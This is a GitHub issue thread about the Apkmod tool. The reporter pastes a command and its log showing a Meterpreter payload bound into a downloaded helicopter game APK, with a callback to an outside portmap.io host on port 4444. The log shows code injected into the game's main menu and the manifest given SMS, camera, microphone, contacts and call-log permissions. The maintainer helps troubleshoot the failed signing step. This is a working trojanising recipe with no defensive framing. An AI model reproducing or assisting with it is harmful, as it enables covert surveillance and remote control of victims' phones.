### ISSUE TITLE
Apkmod can't sign the APK , and can't get the output file.

### ISSUE THREAD

**Issue by nishalbarman** [Hax4us/Apkmod#19]
apkmod -b $HOME/heli.apk -o $HOME/hacks.apk LHOST=Nishal-61661.portmap.io LPORT=4444
[*] Binding /data/data/com.termux/files/home/heli.apk
Using APK template: /data/data/com.termux/files/home/heli.apk
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.fkarim.helicopter.zjblp
[*] Loading /data/data/com.termux/files/usr/share/TermuxAlpine/root/.bind/original/smali/com/fkarim/helicopter/MainMenu.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Rebuilding /data/data/com.termux/files/home/heli.apk with meterpreter injection as /data/data/com.termux/files/usr/share/TermuxAlpine/root/.bind/output.apk
[*] Signing /data/data/com.termux/files/usr/share/TermuxAlpine/root/.bind/output.apk
Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/share/TermuxAlpine/root/.bind/signed.apk
[!] Try again with -a option
But if still can't bind, take screenshot and open a issue on github
![Screenshot_2019-11-24-09-29-32-686_com termux](https://user-images.githubusercontent.com/32856353/69489376-5364f100-0e9d-11ea-8c14-23854a727661.jpg)

**Comment by Hax4us** [comment]
@nishalbarman can you give original app in which u r trying to bind

**Comment by nishalbarman** [comment]
Ok it's a 1 mb game app , The link of the app is
https://www.apk4now.com/apk/34984/helicopter-game/download/35545

**Comment by Hax4us** [comment]
Sorry for delay, but now update it through  `apkmod -u` and try again

**Comment by Hax4us** [comment]
Closing since no response

**Comment by vi-shalt** [comment]
![Screenshot_20200502-150832_Termux](https://user-images.githubusercontent.com/64343457/80860674-cfeacf80-8c86-11ea-8448-7d3ae792cac1.jpg)

**Comment by abcdefghijklmonpqrstuvwxyz** [comment]
![Screenshot_2021-02-07-04-01-29-99_84d3000e3f4017145260f7618db1d683](https://user-images.githubusercontent.com/73631511/107131038-32998780-68f9-11eb-86f9-d4cf3db9b685.jpg)

**Comment by Hax4us** [comment]
@abcdefghijklmonpqrstuvwxyz `apkmod -u`
